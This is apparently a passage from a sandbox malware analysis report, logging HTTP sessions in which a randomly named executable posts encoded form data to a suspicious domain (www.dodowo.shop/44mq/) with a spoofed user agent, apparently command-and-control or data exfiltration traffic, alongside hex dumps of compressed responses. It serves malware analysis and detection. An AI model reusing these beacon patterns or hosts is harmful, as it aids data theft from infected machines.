                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHbqSQHjPKquvRJKM0e3FIZr%2F0n%2BrkuGSQ36wCPGT3DzCpXH530QA5upd14kszqy7m2fUL5UAeggMbGZTKNv83t0ncJJqyAaukwNhUoLUk4Iv5xlw3em8IVBSAuVfMmtS0Iv0aUeMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8fff30d86a36727b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2312&min_rtt=2312&rtt_var=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=587&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                    Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
                                                                                                                    Jan 10, 2025 20:49:31.809735060 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.649996112.175.247.179802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:38.200927973 CET833OUTPOST /44mq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dodowo.shop
                                                                                                                    Origin: http://www.dodowo.shop
                                                                                                                    Referer: http://www.dodowo.shop/44mq/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 53 71 61 6b 5a 51 38 39 48 2f 56 57 71 35 55 6d 50 5a 66 58 43 33 4b 35 4d 52 7a 44 30 75 44 4c 43 49 33 69 37 4a 6b 33 46 59 76 4c 4c 6e 70 50 70 41 41 35 33 45 73 31 49 6b 6a 66 5a 69 79 64 73 50 56 5a 66 65 52 34 41 63 41 6e 6c 48 51 54 45 63 44 30 53 59 35 5a 6d 5a 37 6e 65 48 4d 77 57 37 70 75 34 58 52 47 62 6c 59 34 4f 4e 45 37 68 4b 38 6e 6a 58 55 70 55 42 50 49 54 53 78 62 49 49 36 43 65 4b 76 37 4d 78 46 77 2b 63 70 2f 4b 57 49 75 7a 52 2f 76 57 56 74 37 72 66 65 48 4f 6e 69 39 51 47 4f 37 58 2f 57 6b 42 69 4b 7a 4a 74 73 63 72 37 67 79 79 62 6e 5a 72 75 43 35 75 55 6d 6f 35 4d 4d 49 58 4d 50 34
                                                                                                                    Data Ascii: nzs0T2=SqakZQ89H/VWq5UmPZfXC3K5MRzD0uDLCI3i7Jk3FYvLLnpPpAA53Es1IkjfZiydsPVZfeR4AcAnlHQTEcD0SY5ZmZ7neHMwW7pu4XRGblY4ONE7hK8njXUpUBPITSxbII6CeKv7MxFw+cp/KWIuzR/vWVt7rfeHOni9QGO7X/WkBiKzJtscr7gyybnZruC5uUmo5MMIXMP4
                                                                                                                    Jan 10, 2025 20:49:39.360182047 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: openresty
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:39 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c [TRUNCATED]
                                                                                                                    Data Ascii: e99ZK>{,T,7)Her*(jIHxiG(VJ1k9IZLw====3w'^v4=B\Mb3*qbf2qzWgYz$fBG+<"pO>#o)#<Q1@e@f*#xQYCy8$Z<7Yzo~??-:ql|{c;ZxR&$c#|mH)ZBLG84n@BzS_,QIm8 h38Y-J{B:AQ~"Cys4oy'~rlBAaFh3b2q kQ]RQ6OwS(%|`f7DLhG0->8|G!XfR%DEUI'WA^OI!Mf9,P.j5f^8a)%5|Qe/jm\]!i<v9:L0i{S( fM/jW)>yD0`n(4_-mt?}|AH|r7F$&}qt5cmr)Jty*&};ay32#zDGiOk%sxj>#YBL&_`D5Q0Q3M1N\5>B0}BLtK
                                                                                                                    Jan 10, 2025 20:49:39.360224962 CET1236INData Raw: 87 77 1c 5f 62 98 06 91 98 16 af 63 12 8c c6 99 06 0d 30 ea f0 19 4c a3 9a 01 b9 a5 f5 8b 01 70 2d 9f 43 a0 d7 9d 4f 28 c5 37 2a 31 47 a0 13 9f 43 d0 1d ef 23 da f4 81 50 d3 a9 ab 1e a1 53 2c 74 d2 3f 94 36 5a 9f 92 2c a7 31 ca 4c 02 4e 70 a3 2e
                                                                                                                    Data Ascii: w_bc0Lp-CO(7*1GC#PS,t?6Z,1LNp.Mfu]"{9Js=(e1r1Ew<E>$"w,ge#`L{pjNC\^WV!tU<^]T7+2B4Zn9B1i-?k03
                                                                                                                    Jan 10, 2025 20:49:39.360238075 CET1236INData Raw: 77 86 c3 61 bf 34 a4 31 6b ad 3b f5 76 dd eb 17 2e 61 50 ec 07 39 eb 75 e1 5f 7a dd af 38 03 b7 7a 9f a7 68 c3 27 b0 63 15 fb ff a2 71 6e 7c 98 43 4f 35 5b 2d 3e c5 77 11 d4 51 1a 12 4d b6 59 af d7 17 6d 7d 5e 6b 15 c7 24 b6 69 3b 4d 12 4d 4b ad
                                                                                                                    Data Ascii: wa41k;v.aP9u_z8zh'cqn|CO5[->wQMYm}^k$i;MMK^*tT|de 2U]Zv$LI{4Ia,6Y!{cJFVzDV"9;[V.PfVcr@ll(:w`V_L&!1Rp^N
                                                                                                                    Jan 10, 2025 20:49:39.360251904 CET408INData Raw: 61 75 df b4 a7 f4 15 b6 8d b6 be b5 e4 55 b6 4d 1e 51 ee 32 f7 93 bb cc b4 51 df db 8a 5d e1 da 28 b7 28 e7 6f 25 b4 60 91 48 2c 62 7e f5 5c 77 b2 76 d0 fb 01 32 c1 31 20 7b e7 87 63 40 76 67 8d 63 a4 ef 97 4b 8e 41 b8 7d 86 39 06 ed a8 bc f3 01
                                                                                                                    Data Ascii: auUMQ2Q]((o%`H,b~\wv21 {c@vgcKA}9FGa}:[fvj&Aru# uvr(a`9 gr\umss(V?2V%CQ*o<n+9N Tr!Cl
                                                                                                                    Jan 10, 2025 20:49:39.360265017 CET1236INData Raw: 62 30 30 0d 0a ec 1d 6b 6f e3 36 f2 af 08 1b 1c b0 2e 2c ad 25 d9 4e a2 a0 8b 03 0a 1c 0a 14 fd 70 d7 8f 45 b1 90 6d d9 16 d6 b6 04 59 4e b6 35 f2 df 3b 33 7c 88 12 49 89 8a d3 7e b9 6e 90 85 cd c7 cc 68 34 9c 17 87 4c 4f 3d e3 d7 74 93 9d d6 99
                                                                                                                    Data Ascii: b00ko6.,%NpEmYN5;3|I~nh4LO=tgf'$?QRVGUCFu{x_~Qujpazbyr7_Hc,5h=v]nkcuz*iiC=-2CmYqa`L
                                                                                                                    Jan 10, 2025 20:49:39.360285044 CET224INData Raw: 6f 10 ed ce 4b c7 14 25 33 2a bc 5a d9 22 16 d7 be 07 e0 b2 95 50 9e 05 c2 3e f6 6d 5b ac 2f 67 f9 2d 5d d7 f9 73 26 c5 4f 8c 0d da 83 83 ee 68 23 31 72 b2 b9 57 c0 32 f7 0a d0 26 31 17 80 8d 7d 1c ac b1 cf 04 94 af 12 13 4c d1 65 00 29 ba 4c 10
                                                                                                                    Data Ascii: oK%3*Z"P>m[/g-]s&Oh#1rW2&1}Le)L3}O}UJ^"^)7-hFup-<jk|+S}b'A@Y=RN]Nuz]L?<pABLX[[a|p[K
                                                                                                                    Jan 10, 2025 20:49:39.360296965 CET1236INData Raw: 2e a2 1d 1c 8b 55 0e b6 ea 6f 43 2c 9c ad bf 04 af 48 24 f8 78 4d 29 de 37 e4 a5 e0 ae d4 1f 65 3b 90 55 fb 28 77 93 26 eb e0 b3 43 30 b2 2b 59 65 e0 7c 64 f2 18 0c dd c1 a1 7a b0 01 4a 20 ed 80 7a fb 88 53 48 f7 73 da bc 24 96 ef 99 f5 e6 38 e7
                                                                                                                    Data Ascii: .UoC,H$xM)7e;U(w&C0+Ye|dzJ zSHs$8!Vc&X?ficz;ou+9aeB85\}UwgdBgo[w\+-\.uDEYQ,M-{f{e*'t]an@yX"z]ONvt
                                                                                                                    Jan 10, 2025 20:49:39.360308886 CET127INData Raw: 19 78 64 c9 8a eb 1b 98 8e 48 16 56 1c ad 1c ef 10 a5 3a 10 46 bd f1 6d 0e 80 76 78 7d f6 a9 7f e9 1b 6c f1 d6 89 33 06 c6 2c 18 7b a5 7e f1 02 0e 02 ff 8a e7 58 67 99 ca 9e 5d 62 58 1d 9d 1a 46 f2 a6 4e 18 29 13 04 ef 95 fb a3 9e 59 b7 47 2d 8c
                                                                                                                    Data Ascii: xdHV:Fmvx}l3,{~Xg]bXFN)YG-jOC$MVv4
                                                                                                                    Jan 10, 2025 20:49:39.367150068 CET1236INData Raw: 62 34 64 0d 0a c4 5d 4f 6f 24 47 15 3f b3 9f a2 99 15 08 89 74 bb fe 76 75 05 db 91 08 a0 e4 b0 68 95 80 38 5a e3 b1 63 0f 3b f6 58 33 f6 38 d9 13 42 42 8a 14 0e 20 0e 48 20 0e 91 22 e5 82 50 38 22 3e d2 3a df 81 f7 fb 55 75 4f cf 78 66 d6 6c 1c
                                                                                                                    Data Ascii: b4d]Oo$G?tvuh8Zc;X38BB H "P8">:UuOxflEz_]x9Gx9az'+teG",JDEzbEqydxq#Uxn6x[TE'toQXSN/&crHtC"I_4
                                                                                                                    Jan 10, 2025 20:49:39.367180109 CET1236INData Raw: d5 67 9f 7e fd d9 57 3d f2 f6 6e 26 87 4b 07 be bf 27 b6 9c 3c ff d3 35 8f 93 bc fd d6 d0 b0 c1 7f b1 c7 1b 78 e8 07 78 cb 9c 60 a5 9b 2f eb 61 be 8d 18 cb 1b 38 c2 a0 ad ed bd 6c 29 3f 0f b5 a1 25 d7 f0 7e 1e 9d 5b 8e 01 6d 3d 1d 28 fc fe e9 49
                                                                                                                    Data Ascii: g~W=n&K'<5xx`/a8l)?%~[m=(IOtBxE.!d\.S6r2p_5-n3;=@,B6#[:q'B_sKc,y(KYOTe^
                                                                                                                    Jan 10, 2025 20:49:39.367192984 CET428INData Raw: 1c aa c6 27 73 01 a5 92 25 93 eb be 7e c3 68 fc fe e5 fc 7a 78 36 1b 5e 7c eb f1 78 dc 8d f4 58 11 b9 c3 f8 9d c7 e4 8e 8b f7 a3 b2 58 d2 37 c8 31 b5 92 94 31 f7 46 af 22 61 e8 81 cc 4d ce c3 bb 9a 54 3e 97 ae b9 63 ea 54 26 04 04 49 63 d0 8d c3
                                                                                                                    Data Ascii: 's%~hzx6^|xXX711F"aMT>cT&IcvQRkz%[48"SySOZI.9/i1P.2Hl=QWG/&%}CNbe~&2'*0r$@g


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.649997112.175.247.179802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:40.747273922 CET857OUTPOST /44mq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dodowo.shop
                                                                                                                    Origin: http://www.dodowo.shop
                                                                                                                    Referer: http://www.dodowo.shop/44mq/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 53 71 61 6b 5a 51 38 39 48 2f 56 57 72 5a 6b 6d 4e 37 33 58 41 58 4b 36 51 68 7a 44 69 65 44 58 43 49 72 69 37 49 67 6e 46 71 4c 4c 46 6c 78 50 71 45 30 35 30 45 73 31 44 45 6a 61 64 69 79 73 73 50 51 6d 66 62 35 34 41 63 55 6e 6c 47 67 54 45 76 37 31 53 49 35 58 70 35 37 6c 44 58 4d 77 57 37 70 75 34 57 31 38 62 6c 51 34 50 2b 63 37 67 75 6f 6b 67 58 55 71 44 78 50 49 43 69 77 51 49 49 36 67 65 49 62 46 4d 33 42 77 2b 64 5a 2f 4a 48 49 76 39 52 2f 68 4c 6c 73 74 72 4b 6d 50 58 57 76 4f 63 6e 36 44 43 38 4f 6d 45 55 58 70 56 65 73 2f 35 72 41 77 79 5a 2f 72 72 4f 43 54 73 55 65 6f 72 62 41 76 59 34 71 62 72 34 63 41 68 6e 56 43 4a 4c 35 79 76 67 51 57 68 59 63 64 58 51 3d 3d
                                                                                                                    Data Ascii: nzs0T2=SqakZQ89H/VWrZkmN73XAXK6QhzDieDXCIri7IgnFqLLFlxPqE050Es1DEjadiyssPQmfb54AcUnlGgTEv71SI5Xp57lDXMwW7pu4W18blQ4P+c7guokgXUqDxPICiwQII6geIbFM3Bw+dZ/JHIv9R/hLlstrKmPXWvOcn6DC8OmEUXpVes/5rAwyZ/rrOCTsUeorbAvY4qbr4cAhnVCJL5yvgQWhYcdXQ==
                                                                                                                    Jan 10, 2025 20:49:41.905973911 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: openresty
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:41 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c [TRUNCATED]
                                                                                                                    Data Ascii: e99ZK>{,T,7)Her*(jIHxiG(VJ1k9IZLw====3w'^v4=B\Mb3*qbf2qzWgYz$fBG+<"pO>#o)#<Q1@e@f*#xQYCy8$Z<7Yzo~??-:ql|{c;ZxR&$c#|mH)ZBLG84n@BzS_,QIm8 h38Y-J{B:AQ~"Cys4oy'~rlBAaFh3b2q kQ]RQ6OwS(%|`f7DLhG0->8|G!XfR%DEUI'WA^OI!Mf9,P.j5f^8a)%5|Qe/jm\]!i<v9:L0i{S( fM/jW)>yD0`n(4_-mt?}|AH|r7F$&}qt5cmr)Jty*&};ay32#zDGiOk%sxj>#YBL&_`D5Q0Q3M1N\5>B0}BLtK
                                                                                                                    Jan 10, 2025 20:49:41.905993938 CET224INData Raw: 87 77 1c 5f 62 98 06 91 98 16 af 63 12 8c c6 99 06 0d 30 ea f0 19 4c a3 9a 01 b9 a5 f5 8b 01 70 2d 9f 43 a0 d7 9d 4f 28 c5 37 2a 31 47 a0 13 9f 43 d0 1d ef 23 da f4 81 50 d3 a9 ab 1e a1 53 2c 74 d2 3f 94 36 5a 9f 92 2c a7 31 ca 4c 02 4e 70 a3 2e
                                                                                                                    Data Ascii: w_bc0Lp-CO(7*1GC#PS,t?6Z,1LNp.Mfu]"{9Js=(e1r1Ew<E>$"w,ge#`L{pjNC\^WV!tU<^]T7+2B4Zn9B1
                                                                                                                    Jan 10, 2025 20:49:41.906017065 CET1236INData Raw: 91 fa 9c cc 69 2d ac 3f b0 07 8a a4 6b 30 eb d2 a6 33 09 76 39 eb c3 f9 ac f3 a0 a0 ae 92 c7 3e 19 06 31 f1 95 53 97 af 0f c9 10 7d 9d d0 37 84 fe 32 4c 06 38 7c ca eb 89 b3 33 46 c2 21 54 00 10 ef b1 27 25 79 c0 fd f9 f1 70 08 49 9a 90 f8 a1 70
                                                                                                                    Data Ascii: i-?k03v9>1S}72L8|3F!T'%ypIpTVQPbUdEK?k<>Xy>ZSMO\S0p`eI&liY;`BRAEt@&7/C$/K7SN"S}de&5O-=0ye"Kb8}
                                                                                                                    Jan 10, 2025 20:49:41.906028986 CET224INData Raw: 83 0c 4c ca a7 91 cf a4 94 26 c5 21 31 52 70 5e 4e d7 ee f8 b8 2d a7 bb 0c 2e 03 df a0 04 f2 c2 1d 6f e8 10 87 c8 e9 c2 1c a2 31 c9 d9 8c 01 bc 26 1e 15 3a b4 ba 9b 86 b5 c2 83 79 0d c9 59 bc c1 66 16 9e 1d c1 06 50 9b 09 ab 00 79 7b e0 7b 83 e6
                                                                                                                    Data Ascii: L&!1Rp^N-.o1&:yYfPy{{6agfuV}jCo*9)!'60"Cq]v,f#gvb{17r^-9sk/sG+g2X-{O.8TH
                                                                                                                    Jan 10, 2025 20:49:41.906042099 CET1236INData Raw: 56 5b ba dd 68 eb 8e d3 d6 6d 0d 59 bf e0 8d aa dd 6c ea 1d 1b 1a 1b 1a b2 2d eb 17 9b a1 57 c3 b0 c4 ae c6 da 66 7c d5 76 1c c0 b1 74 bb 63 2d e0 2d dd b1 3a ba 5d b7 76 a2 4b f2 06 d7 60 43 0e da 66 06 a7 e9 80 0e 4d dd 2a cd c0 1b 9b ba 6d cd
                                                                                                                    Data Ascii: V[hmYl-Wf|vtc--:]vK`CfM*moJYZC7Z7v}2N>Am$WFXhml7'sn;|r&h@Fp3gi>0XSX-AOph$n5
                                                                                                                    Jan 10, 2025 20:49:41.906054974 CET224INData Raw: 16 d6 b6 04 59 4e b6 35 f2 df 3b 33 7c 88 12 49 89 8a d3 7e b9 6e 90 85 cd c7 cc 68 34 9c 17 87 4c 4f 3d e3 d7 74 93 9d d6 99 d8 67 1a ac 66 e4 27 24 3f 51 c1 c7 f9 13 9f fe 09 16 52 56 b3 12 47 06 a9 55 d0 08 ec 0b c2 a8 af a2 b1 43 46 a7 96 d1
                                                                                                                    Data Ascii: YN5;3|I~nh4LO=tgf'$?QRVGUCFu{x_~Qujpazbyr7_Hc,5h=v]nkcuz*iiC=-2CmYqa`L)yN%w
                                                                                                                    Jan 10, 2025 20:49:41.906069994 CET1236INData Raw: 98 5e da a6 c7 fc f0 7b f2 3f 3c 32 5c 4c bd 73 7a 02 8d 9e 55 b9 02 1e 8f e5 e0 f6 a5 3a fe bf 97 0c 8f 40 a4 07 f3 94 b2 ca 8f 58 4e 7c 4a 9f 5b d3 7e 86 cf 30 b4 4a 6b f3 bc 2d 2f 54 a7 49 89 69 04 df 02 73 18 c9 d7 36 3b 85 9d 84 d1 e3 8c 36
                                                                                                                    Data Ascii: ^{?<2\LszU:@XN|J[~0Jk-/TIis6;6;>owd<9k}>qg~5oI=>|Lh'n)"9V&Q6y3%iPO #nzqRvt2L0gy5S(kVN=,zN,/9
                                                                                                                    Jan 10, 2025 20:49:41.906081915 CET1236INData Raw: eb e0 b3 43 30 b2 2b 59 65 e0 7c 64 f2 18 0c dd c1 a1 7a b0 01 4a 20 ed 80 7a fb 88 53 48 f7 73 da bc 24 96 ef 99 f5 e6 38 e7 13 1b 0e 81 21 fd 56 9c 8a 63 9e 9d c7 26 dd c2 58 f7 c7 a2 8e 3f 66 de 69 b1 ba 63 ae a4 02 97 dd 06 7a e9 d5 ce 9b a5
                                                                                                                    Data Ascii: C0+Ye|dzJ zSHs$8!Vc&X?ficz;ou+9aeB85\}UwgdBgo[w\+-\.uDEYQ,M-{f{e*'t]an@yX"z]ONvt#^/0'2*\U&DVN\=
                                                                                                                    Jan 10, 2025 20:49:41.906090975 CET87INData Raw: c6 2c 18 7b a5 7e f1 02 0e 02 ff 8a e7 58 67 99 ca 9e 5d 62 58 1d 9d 1a 46 f2 a6 4e 18 29 13 04 ef 95 fb a3 9e 59 b7 47 2d 8c 91 9d fd 6a fb cd 4f 43 e1 c0 a8 24 c1 dc 8d c1 f6 cc db 4d b4 0e 1a b1 56 08 76 03 aa d1 09 02 b2 9e f2 34 f2 9f 00 00
                                                                                                                    Data Ascii: ,{~Xg]bXFN)YG-jOC$MVv4
                                                                                                                    Jan 10, 2025 20:49:41.912827015 CET1236INData Raw: 62 34 64 0d 0a c4 5d 4f 6f 24 47 15 3f b3 9f a2 99 15 08 89 74 bb fe 76 75 05 db 91 08 a0 e4 b0 68 95 80 38 5a e3 b1 63 0f 3b f6 58 33 f6 38 d9 13 42 42 8a 14 0e 20 0e 48 20 0e 91 22 e5 82 50 38 22 3e d2 3a df 81 f7 fb 55 75 4f cf 78 66 d6 6c 1c
                                                                                                                    Data Ascii: b4d]Oo$G?tvuh8Zc;X38BB H "P8">:UuOxflEz_]x9Gx9az'+teG",JDEzbEqydxq#Uxn6x[TE'toQXSN/&crHtC"I_4
                                                                                                                    Jan 10, 2025 20:49:41.912883997 CET1236INData Raw: d5 67 9f 7e fd d9 57 3d f2 f6 6e 26 87 4b 07 be bf 27 b6 9c 3c ff d3 35 8f 93 bc fd d6 d0 b0 c1 7f b1 c7 1b 78 e8 07 78 cb 9c 60 a5 9b 2f eb 61 be 8d 18 cb 1b 38 c2 a0 ad ed bd 6c 29 3f 0f b5 a1 25 d7 f0 7e 1e 9d 5b 8e 01 6d 3d 1d 28 fc fe e9 49
                                                                                                                    Data Ascii: g~W=n&K'<5xx`/a8l)?%~[m=(IOtBxE.!d\.S6r2p_5-n3;=@,B6#[:q'B_sKc,y(KYOTe^


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.649998112.175.247.179802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:43.289314032 CET1870OUTPOST /44mq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dodowo.shop
                                                                                                                    Origin: http://www.dodowo.shop
                                                                                                                    Referer: http://www.dodowo.shop/44mq/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
